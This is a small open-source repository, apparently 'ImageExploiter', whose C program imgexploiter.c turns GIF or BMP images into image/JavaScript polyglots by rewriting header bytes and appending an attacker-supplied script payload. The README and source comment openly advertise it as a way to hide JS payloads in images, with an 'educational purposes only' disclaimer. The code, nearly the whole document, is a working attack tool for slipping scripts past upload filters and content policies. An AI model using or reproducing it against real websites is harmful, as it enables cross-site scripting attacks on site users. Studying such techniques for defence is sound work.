├── README.md
├── .gitattributes
├── .gitignore
└── imgexploiter.c


/README.md:
--------------------------------------------------------------------------------
1 | ImageExploiter
2 | ==============
3 | 
4 | Hide JavaScript inside your GIF and BMP images
5 | http://osandamalith.wordpress.com/2014/11/13/js-via-images/ 
6 | 


--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
 1 | # Auto detect text files and perform LF normalization
 2 | * text=auto
 3 | 
 4 | # Custom for Visual Studio
 5 | *.cs     diff=csharp
 6 | *.sln    merge=union
 7 | *.csproj merge=union
 8 | *.vbproj merge=union
 9 | *.fsproj merge=union
10 | *.dbproj merge=union
11 | 
12 | # Standard to msysgit
13 | *.doc	 diff=astextplain
14 | *.DOC	 diff=astextplain
15 | *.docx diff=astextplain
16 | *.DOCX diff=astextplain
17 | *.dot  diff=astextplain
18 | *.DOT  diff=astextplain
19 | *.pdf  diff=astextplain
20 | *.PDF	 diff=astextplain
21 | *.rtf	 diff=astextplain
22 | *.RTF	 diff=astextplain
23 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
 1 | # Windows image file caches
 2 | Thumbs.db
 3 | ehthumbs.db
 4 | 
 5 | # Folder config file
 6 | Desktop.ini
 7 | 
 8 | # Recycle Bin used on file shares
 9 | $RECYCLE.BIN/
10 | 
11 | # Windows Installer files
12 | *.cab
13 | *.msi
14 | *.msm
15 | *.msp
16 | 
17 | # =========================
18 | # Operating System Files
19 | # =========================
20 | 
21 | # OSX
22 | # =========================
23 | 
24 | .DS_Store
25 | .AppleDouble
26 | .LSOverride
27 | 
28 | # Icon must end with two \r
29 | Icon

30 | 
31 | # Thumbnails
32 | ._*
33 | 
34 | # Files that might appear on external disk
35 | .Spotlight-V100
36 | .Trashes
37 | 
38 | # Directories potentially created on remote AFP share
39 | .AppleDB
40 | .AppleDesktop
41 | Network Trash Folder
42 | Temporary Items
43 | .apdisk
44 | 


--------------------------------------------------------------------------------
/imgexploiter.c:
--------------------------------------------------------------------------------
  1 | #include <stdio.h>
  2 | #include <stdlib.h>
  3 | #include <string.h>
  4 | #include <fcntl.h>
  5 | #include <sys/stat.h>
  6 | 
  7 | #define MAX 500
  8 | /*
  9 | The MIT License (MIT)
 10 | 
 11 | Copyright (c) 2014 Osanda Malith Jayathissa
 12 | 
 13 | Permission is hereby granted, free of charge, to any person obtaining a copy
 14 | of this software and associated documentation files (the "Software"), to deal
 15 | in the Software without restriction, including without limitation the rights
 16 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 17 | copies of the Software, and to permit persons to whom the Software is
 18 | furnished to do so, subject to the following conditions:
 19 | 
 20 | The above copyright notice and this permission notice shall be included in all
 21 | copies or substantial portions of the Software.
 22 | 
 23 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 24 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 25 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
 26 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 27 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 28 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
 29 | SOFTWARE.
 30 | 
 31 | Author: Osanda Malith Jayathissa
 32 | E-Mail: osanda[cat]unseen.is
 33 | Description: You can hide your JS payload inside a gif or bmp image.
 34 | Write-up:  http://osandamalith.wordpress.com/2014/11/13/js-via-images/
 35 | Disclaimer: Author takes no responsibility of any damage you cause. 
 36 |             Use this for educational purposes only.
 37 | */
 38 | void 
 39 | inject(char *payload, char *fname, char *format) {
 40 |    int src, dst;
 41 |    int firstTimeIn;
 42 |    char myPreviousChar;
 43 |    char myCurrentChar;
 44 |    char newFilename[MAX];
 45 | 
 46 |    strcpy(newFilename, fname);
 47 |    if (!strcmp(format, "gif")) strcat(newFilename, "_exploit.gif");
 48 |    else if (!strcmp(format, "bmp")) strcat(newFilename, "_exploit.bmp");
 49 |    else { printf("[-] Invalid File Format\n"); exit(0); }
 50 | 
 51 | #ifdef _WIN32
 52 |    src = open(fname, O_RDONLY | O_BINARY, 0);
 53 |    dst = open(newFilename, O_CREAT | O_TRUNC | O_WRONLY | O_BINARY, S_IREAD | S_IWRITE);
 54 | 
 55 | #elif __unix__
 56 |    src = open(fname, O_RDONLY, 0);
 57 |    dst = open(newFilename, O_CREAT | O_TRUNC | O_WRONLY, S_IRUSR | S_IWUSR | S_IRGRP | S_IROTH);
 58 | 
 59 | #endif
 60 |    firstTimeIn = 1;
 61 | 
 62 |    while (read(src, &myCurrentChar, 1)) {
 63 |       if (firstTimeIn == 1) {
 64 |          firstTimeIn = 0;
 65 |          myPreviousChar = myCurrentChar;
 66 |       } else {
 67 |          if (((myPreviousChar == 0x2A) && (myCurrentChar == 0x2F)) \
 68 |           || ((myPreviousChar == 0x2F) && (myCurrentChar == 0x2A))) {
 69 |             myPreviousChar = 0x00;
 70 |             myCurrentChar = 0x00;
 71 |          }
 72 |          write(dst, &myPreviousChar, 1);
 73 |          myPreviousChar = myCurrentChar;
 74 |       }
 75 |    }
 76 | 
 77 |    write(dst, &myPreviousChar, 1);
 78 |  
 79 |    lseek(dst, !strcmp(format, "gif") ? 6 : 2 , SEEK_SET);
 80 |    
 81 |    write(dst, "\x2F", 1);
 82 |    write(dst, "\x2A", 1);
 83 | 
 84 |    close(src);
 85 |    close(dst);
 86 | #ifdef _WIN32
 87 |    dst = open(newFilename, O_WRONLY | O_APPEND | O_BINARY, 0);
 88 | 
 89 | #elif __unix__   
 90 |    dst = open(newFilename, O_WRONLY | O_APPEND, 0);
 91 | 
 92 | #endif
 93 |    write(dst, "\x2A", 1);
 94 |    write(dst, "\x2F", 1);
 95 |    write(dst, "\x3D", 1);
 96 |    write(dst, "\x31", 1);
 97 |    write(dst, "\x3B", 1);
 98 | 
 99 |    write(dst, payload, strlen(payload));
100 | 
101 |    write(dst, "\x3B", 1);
102 | 
103 |    close(dst);
104 |    printf("\n[+] Successfully written to %s\n", newFilename);
105 | }
106 | 
107 | int 
108 | main(int argc, char *argv[]) {
109 |    int i;
110 |    char *fileName;
111 |    char *format;
112 |    char *payloadString;
113 | 
114 |    printf(" _____                   \n");
115 |    printf("|     |_____ ___ ___ ___ \n");
116 |    printf("|-   -|     | .'| . | -_|\n");
117 |    printf("|_____|_|_|_|__,|_  |___|\n");
118 |    printf("                |___|    \n");
119 |    printf("\t _____         _ ___ _ _           \n");
120 |    printf("\t|   __|_ _ ___| |   |_| |_ ___ ___ \n");
121 |    printf("\t|   __|_'_| . | | | | |  _| -_|  _|\n");
122 |    printf("\t|_____|_,_|  _|_|___|_|_| |___|_|  \n");
123 |    printf("\t          |_|                      \n");
124 |    printf("\n[~] Author: Osanda Malith Jayathissa\n[~] Website: http://OsandaMalith.wordpress.com\n[~] E-Mail: osanda[cat]unseen.is\n");
125 | 
126 |    if (argc != 7)  {
127 |       printf("\n[-] Usage: %s -i <image file name> -f <gif or bmp> -p <payload string> \n", argv[0]);
128 |       return 1;
129 |    }
130 | 
131 |    for (i = 1; i < argc; i++)  {
132 |       if (!strcmp(argv[i], "-i")) fileName = argv[i+1];
133 |       if (!strcmp(argv[i], "-f")) format = argv[i+1];
134 |       if (!strcmp(argv[i], "-p")) payloadString = argv[i+1];     
135 |       }
136 |    
137 |    inject(payloadString, fileName, format);
138 |    return 0;
139 | }
140 | /*EOF*/
141 | 


--------------------------------------------------------------------------------